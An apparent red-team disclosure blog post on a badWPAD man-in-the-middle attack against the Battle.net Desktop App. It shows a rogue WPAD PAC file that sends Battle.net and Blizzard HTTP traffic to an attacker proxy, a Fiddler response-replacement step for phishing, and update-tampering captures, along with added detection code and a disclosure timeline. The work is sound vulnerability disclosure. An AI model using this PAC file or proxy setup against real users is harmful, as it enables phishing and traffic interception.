BadWPAD and spear-phishing utilizing Battle.net Desktop App

blog.redteam.pl, 4 years ago

Brief introduction

In this blog post I would like to describe an example which shows how serious the consequences of a successful badWPAD attack can be. It is not possible to execute a MiTM (man-in-the-middle) attack on encrypted HTTPS communication without the victim accepting a rogue certificate; nevertheless, an attacker can freely modify cleartext HTTP traffic. This attack can be successfully performed against many modern applications which still use the plain HTTP protocol for communication, updates etc. One such example is the Battle.net Desktop App, used by millions of users around the world. An attacker can change the information presented to a victim in many different locations inside the application and use this to execute high-quality social engineering attacks on a mass scale.

MiTM attack on Battle.net Desktop App

How can this attack be used to execute high-quality, non-email-based spear-phishing? I am going to show this in a case study of the Battle.net Desktop App. Many applications are still using the HTTP protocol, most likely for performance reasons.

Applications like the Battle.net Desktop App actually honour WPAD [https://eu.battle.net/support/en/article/23664]. Right after triggering the badWPAD attack we start receiving requests for a WPAD configuration file:

94.172.124.64 - - [21/Jun/2020:12:31:33 +0200] "GET /wpad.dat HTTP/1.1" 200 4864 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Battle.net/1.22.0.12040 (retail) Chrome/75.0.3770.100 Safari/537.36"
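From the defender's side, the same web-server log line is the place to spot WPAD auto-discovery clients that may be exposed to a badWPAD attack. The following detection snippet is an added example, not code from the original post; it parses combined-format access-log lines, flags `wpad.dat` fetches and names the requesting application from the User-Agent. The sample lines are constructed (RFC 5737 documentation addresses), modelled on the request shown above.

```javascript
// Added example (not from the original post): flag WPAD PAC fetches in an
// Apache/nginx combined-format access log and name the requesting client.
// Sample lines are constructed; 192.0.2.0/24 is a documentation range.
const SAMPLE_LOG = [
  '192.0.2.10 - - [21/Jun/2020:12:31:33 +0200] "GET /wpad.dat HTTP/1.1" 200 4864 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Battle.net/1.22.0.12040 (retail) Chrome/75.0.3770.100 Safari/537.36"',
  '192.0.2.11 - - [21/Jun/2020:12:31:40 +0200] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.68.0"',
  '192.0.2.12 - - [21/Jun/2020:12:32:01 +0200] "GET /WPAD.DAT HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) WinHttp-Autoproxy-Service/5.1"',
].join('\n');

// Combined log format: host ident user [time] "request" status bytes "referer" "ua"
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/;

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]), ua: m[6] };
}

// Name the client doing proxy auto-discovery; Battle.net carries its own UA token,
// the Windows system-wide WPAD fetcher announces itself as WinHttp-Autoproxy-Service.
function classifyUA(ua) {
  const app = /Battle\.net\/(\S+)/.exec(ua);
  if (app) return `Battle.net ${app[1]}`;
  if (/WinHttp-Autoproxy-Service/i.test(ua)) return 'Windows WinHTTP autoproxy';
  return 'other';
}

// One alert per WPAD fetch. The path test is deliberately case-insensitive and
// tolerates a query string; `served` tells whether a PAC body was actually handed out.
function findWpadRequests(logText) {
  return logText.split('\n').map(parseLine).filter(Boolean)
    .filter(r => /^\/wpad\.dat(\?|$)/i.test(r.path))
    .map(r => ({ ip: r.ip, time: r.time, served: r.status === 200, client: classifyUA(r.ua) }));
}
```

Run over a sinkhole or proxy log, every `served: true` entry is a host whose proxy settings were just dictated by whoever answered the WPAD name.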

To execute a successful MiTM attack the following WPAD PAC configuration file can be used:

function FindProxyForURL(url, host) {
    if (shExpMatch(url, "http://*.battle.net*") || shExpMatch(url, "http://*.blizzard.com*")) {
        return "PROXY 1.3.3.7:8080; DIRECT";
    }
    // use direct for everything else
    return "DIRECT";
}
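A PAC file is plain JavaScript, so it can be evaluated offline to see exactly which destinations it diverts. The block below is an added example, not part of the original post: it re-implements `shExpMatch` the way PAC runtimes define it (`*` any run of characters, `?` one character), embeds the PAC body shown above unchanged, and audits a constructed list of URLs. It also makes the post's caveat visible: only plain `http://` URLs under a subdomain are proxied, while HTTPS URLs and the bare `battle.net` apex go DIRECT.

```javascript
// Added example (not the post's code): evaluate a PAC file offline and report
// which destinations it would route through a proxy.
// shExpMatch as PAC runtimes define it: '*' = any run of characters, '?' = one char.
function shExpMatch(str, shexp) {
  const re = '^' + shexp.replace(/[.+^${}()|[\]\\]/g, '\\$&')
                        .replace(/\*/g, '.*').replace(/\?/g, '.') + '$';
  return new RegExp(re).test(str);
}

// The PAC body from the post, reproduced verbatim so it can be audited as-is.
function FindProxyForURL(url, host) {
  if (shExpMatch(url, "http://*.battle.net*") || shExpMatch(url, "http://*.blizzard.com*")) {
    return "PROXY 1.3.3.7:8080; DIRECT";
  }
  return "DIRECT";
}

function hostOf(url) { return new URL(url).hostname; }

// Run every URL through the PAC function and mark the non-DIRECT decisions.
function auditPac(pacFn, urls) {
  return urls.map(u => {
    const decision = pacFn(u, hostOf(u));
    return { url: u, decision, proxied: decision.trim().toUpperCase() !== 'DIRECT' };
  });
}

// Constructed sample of the kinds of URLs the launcher and a browser emit.
const SAMPLE_URLS = [
  'http://eu.launcher.battle.net/service/odin/alert/pl-pl',   // plain HTTP, proxied
  'http://eu.cdn.blizzard.com/tpr/bnt001/patch/50/45/cafef00d', // plain HTTP, proxied
  'https://eu.battle.net/login/',                               // HTTPS: DIRECT
  'http://battle.net/',                                         // apex, no '.' before: DIRECT
  'http://example.com/',                                        // unrelated: DIRECT
];
```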

In this example we use Fiddler as the malicious proxy, configured to replace the response content for requests matching:

http://eu.launcher.battle.net/service/(.*)/pl-pl


Here pl-pl in the URL is the Polish language code, so an attacker can tailor the phishing message to specific languages.

The Battle.net Desktop App performs these requests over the unencrypted HTTP protocol:


The message captured above shows up in the desktop application:


These messages can be retrieved with the following commands:

$ curl -is http://eu.launcher.battle.net/service/odin/alert/pl-pl
HTTP/1.1 200 OK
Date: Mon, 29 Jun 2020 11:53:00 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 29 Jun 2020 08:07:15 GMT
ETag: "1d6-5a9348bf472c0"
Accept-Ranges: bytes
Content-Length: 470

Prace konserwacyjne na żywo: wtorek, 30 czerwca, od godz. 05:00 do 07:00. W tym okresie gracze mogą doświadczać rozłączeń, ale ponowne logowanie powinno być możliwe.

Restarty serwerów rozpoczną się w dniu: środa, 1 lipca 03:00 (CEST) do 04:00 (CEST). Ostrzeżenie o nadchodzącym restarcie pojawi się w grze na 15 minut przed jego przeprowadzeniem.

Prosimy śledzić @BlizzardCSEU_PL na Twitterze w celu uzyskania aktualnych informacji o przebiegu prac.

$ curl -is http://eu.launcher.battle.net/service/odin/alert/en-us
HTTP/1.1 200 OK
Date: Mon, 29 Jun 2020 11:53:03 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 29 Jun 2020 08:07:15 GMT
ETag: "179-5a9348bf472c0"
Accept-Ranges: bytes
Content-Length: 377

Live maintenance will be on Tuesday, 30th June from 05:00 until 07:00. During this time, players may experience interruptions of service including disconnects, but should be able to log back in.

Realm restarts will be on Wednesday, 1st July from 03:00 (CEST) until 04:00 (CEST). 15 minutes in-game announcement will be given.

Please follow @BlizzardCSEU_EN on Twitter for updates.

By changing these HTTP responses we can modify the messages shown in the Battle.net desktop application:


This will work for all tabs:


Even before the user is logged into Blizzard account:


An attacker can prepare an arbitrary phishing message such as "we have detected that your account has been hacked, take immediate action" and lure the user to a Battle.net look-alike phishing website, since clickable HTML links can be used in the replaced content.

Another example showing a clickable link in the news window:


Maintenance information:


Please note that links work in all of the above-mentioned places, and all of them can be easily changed by the MiTM proxy. After the user clicks a malicious link it is opened in the default web browser.


This attack could be performed on a large scale by abusing DNS name devolution [https://blog.redteam.pl/2019/05/sinkholing-badwpad-wpadblock-wpadblocking-com.html], domain name collision [https://blog.redteam.pl/2019/10/internal-domain-name-collision-dns.html], or just a LAN MiTM attack based on Windows LLMNR and NBT-NS requests (this works on, among others, Windows 10):


Another scenario for a successful attack, not strictly related to badWPAD, is that an attacker can compromise home routers on a mass scale and replace their DNS servers [https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/HomeRouter/HomeRouterSecurity_2020_Bericht.pdf]. Then, only for selected hostnames, the rogue resolver returns an attacker-controlled IP address which responds with fake content; as the traffic is plain HTTP, no certificate will be verified on the client side.

An attack like this can be used in many different scenarios, including spear-phishing, DoS when used at a larger scale [https://blog.redteam.pl/2019/05/sinkholing-badwpad-wpadblock-wpadblocking-com.html], leaking Net-NTLMv2 hashes etc.

An attacker can also affect the update process:

GET /tpr/bnt001/patch/50/45/504504b7fd0954282978e1bd67984c30 HTTP/1.1
Host: eu.cdn.blizzard.com
Connection: close

HTTP/1.1 200 OK
Date: Sat, 20 Jun 2020 12:33:29 GMT
Content-Type: binary/octet-stream
Content-Length: 1969
Connection: close
Last-Modified: Thu, 18 Jun 2020 21:25:48 GMT
Accept-Ranges: bytes
[...]

Responsible disclosure timeline

  • 27 June 2020 – The problem in the Battle.net Desktop App was reported to Blizzard support and registered as ticket 72857563.
  • 27 June 2020 – The support response we received suggested describing the problem on a public developers forum [https://us.forums.blizzard.com/en/blizzard/c/feedback-discussion/6].
  • 27 June 2020 – As there was no public information on where to report security issues, we reached out via Twitter asking where we can report security issues and got an email address from Blizzard Entertainment North America Customer Support [https://twitter.com/BlizzardCS/status/1276864865437716487].
  • 28 June 2020 – We described the details and e-mailed hacks@blizzard.com.
  • 05 July 2020 – Sent a reminder email due to no response.
  • 10 July 2020 – This blog post was published, which was mentioned in each of our e-mails sent to Blizzard.